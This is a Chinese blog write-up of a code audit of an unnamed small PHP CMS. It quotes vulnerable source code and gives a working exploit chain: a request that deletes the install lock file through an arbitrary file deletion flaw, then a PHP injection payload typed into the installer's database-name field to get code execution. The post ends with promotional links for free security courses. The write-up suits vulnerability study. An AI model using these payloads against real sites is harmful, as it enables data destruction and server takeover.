0×00:前言
记录一次小型cms代码审计
0×01:任意文件删除
由于代码繁杂,不再一一展示
/app/controller/kindeditor.class.php
关键漏洞代码
public function delete() {$path = ROOT_PATH.$_GET['pic'];unlink($path);$flash = M("flash");$row = $flash->query("delete from tc_flash wherephoto='".$_GET['pic']."'");echo '删除成功';}}
可以看到直接调用delete方法get传入pic参数就可以删除任意文件
0×02:Getshell
/install/index.php
case '4':if (intval($_GET['install'])) {$n = intval($_GET['n']);$arr = array();$dbHost = trim($_POST['dbhost']);$dbPort = trim($_POST['dbport']);$dbName = trim($_POST['dbname']);$dbHost = empty($dbPort) || $dbPort == 3306 ? $dbHost : $dbHost .':' . $dbPort;$dbUser = trim($_POST['dbuser']);$dbPwd = trim($_POST['dbpw']);$dbPrefix = empty($_POST['dbprefix']) ? 'tc_' :trim($_POST['dbprefix']);$uname = trim($_POST['manager_email']);$password = trim($_POST['manager_pwd']);$webpath = trim($_POST['webpath']);............if ($i == 999999) exit;$message = '成功添加站点信息<br />成功写入配置文件<br>安装完成.';//$newmodelstr = "<?php \n";$newmodelstr .= " define('DBHOST', '" . $dbHost . "');\n ";$newmodelstr .= "define('DBUSER', '" . $dbUser . "');\n ";$newmodelstr .= "define('DBPWD', '" . $dbPwd . "');\n ";$newmodelstr .= "define('DBNAME', '" . $dbName . "');\n ";$newmodelstr .= "define('DBCODE', 'utf8');\n ";$newmodelstr .= "define('DBCONN', " . $db_pconnect . ");\n ";$newmodelstr .= "define('MORESITE', false);\n ";$newmodelstr .= "define('USEMC', false);\n ";$newmodelstr .= "define('MCHOST', '127.0.0.1');\n ";$newmodelstr .= "define('MCPORT','11211');\n ";$newmodelstr .= "define('MCHOST2', '127.0.0.1');\n ";$newmodelstr .= "define('MCPORT2','11211');\n ";$newmodelstr .= "\n?>\n";$targetFile = '../app/data/mysql.php';@file_put_contents($targetFile, $newmodelstr);$arr = array('n' => 999999, 'msg' => $message);die(json_encode($arr));}include_once ("./templates/s4.php");exit;
在安装cms的时候在$dbName可以写入一句话木马进行getshell
当然当你访问网站的时候已经是安装好了的
这时候需要上一个任意文件删除的漏洞删除/app/data/install.lock文件进行系统重装
0×03:如何调用
/***cms/core/controller.class.php
控制器代码
public function Run() {$this->Analysis ();$this->control = $_GET ['c'];$this->action = $_GET ['a'];if ($_GET ['a'] === "list") {$this->action = "listAll";}$groupDir = GROUP_DIR;$controlFile = ROOT_PATH . '/' . APP_PATH . "/" . GROUP_DIR . "/" .$this->control . '.class.php';if (! file_exists ( $controlFile )) {$this->setValue ( "error", $this->control . Config::lang ("CONTROLLERNOTEXISTS" ) );$this->forward ( "error.html" );exit ();}include ($controlFile);if (! class_exists ( $this->control )) {$this->setValue ( "error", $this->control . Config::lang ("CONTROLLERNOTDEFINED" ) );$this->forward ( "error.html" );exit ();}if (! empty ( $_REQUEST ['token'] ) && ! in_array ( $_REQUEST ['ac'],array ('user_login', 'user_reg', 'user_regOrLoginProtocol', 'user_findPwd','user_getCode' ) )) {$this->pubCheck ();}$instance = new $this->control ();$methodName = $this->action;$instance->$methodName ();$this->forceAttack();
跟进$this->Analysis ();方法
protected function Analysis() {$ac = array ();$acStr = $_GET ['ac'];if (empty ( $acStr )) { // 无ac参数$ac [0] = $this->control;$ac [1] = $this->action;} else if (! strpos ( $acStr, '_' ) && $acStr) { // ac=list$ac [0] = $acStr; // empty($this->control) ?self::getDefaultAction() : $this->control;//NULL$ac [1] = self::getDefaultAction ();$modelClass = $ac [1];$controlClass = $ac [0];} else { // ac=news_list 支持下划线的控制器$acAry = explode ( "_", $acStr );if (count ( $acAry ) == 2) {$modelClass = $acAry [1];$controlClass = $acAry [0];}if (count ( $acAry ) == 3) {$modelClass = $acAry [2];$controlClass = $acAry [0] . '_' . $acAry [1];}}if ($this->c ['URL_MODE'] == 1) {$this->control = ! empty ( $controlClass ) ? trim ( $controlClass ): $this->control;$this->action = ! empty ( $modelClass ) ? trim ( $modelClass ) :$this->action;} else if ($this->c ['URL_MODE'] == 2) {if (isset ( $_SERVER ['PATH_INFO'] )) {$path = trim ( $_SERVER ['PATH_INFO'], '/' );$paths = explode ( '/', $path );// index.php/news/show/id/275$this->control = array_shift ( $paths ); // news$this->action = array_shift ( $paths ); // showParseUrl (); // news/show/id/275 index.php后面的}} else if ($this->c ['URL_MODE'] == 3) {// $_SERVER["QUERY_STRING"]=>// string(19) "ac=news_show&id=275"// $_SERVER["REQUEST_URI"]=>// string(30) "/index.php?ac=news_show&id=275"// bencandy.php?fid-{$fid}-id-{$id}-page-{$page}.html$path = str_replace ( ".asp", "", $_SERVER ["QUERY_STRING"] ); //news-show-1$paths = explode ( '-', $path );$this->control = array_shift ( $paths ); // news$this->action = array_shift ( $paths ); // show$key = $this->action == 'show' ? 'id' : 'page';$_GET [$key] = array_shift ( $paths ); // id page classidss}$_GET ['c'] = ! empty ( $this->control ) ? $this->control : 'index';$_GET ['a'] = ! empty ( $this->action ) ? $this->action :self::getDefaultAction ();$ac [0] = $_GET ['c'];$ac [1] = $_GET ['a'];
http://url/index.php?ac=控制器_方法名进行访问
构造payload ac=kindeditor_delete&pic=/app/data/install.lock
删除成功进到安装界面
数据库名字处输入');phpinfo();//
再次访问/***cms/index.php 成功输出
0×04:总结
代码审计抓住函数跟进就对了,知识点的综合利用很重要。继续审计去了,以上漏洞挺多的。
网络安全学习资源分享:
给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,需要点击下方链接即可前往获取
读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)
同时每个成长路线对应的板块都有配套的视频提供:
大厂面试题
视频配套资料&国内外网安书籍、文档
当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料
所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~
读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)
特别声明:
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。
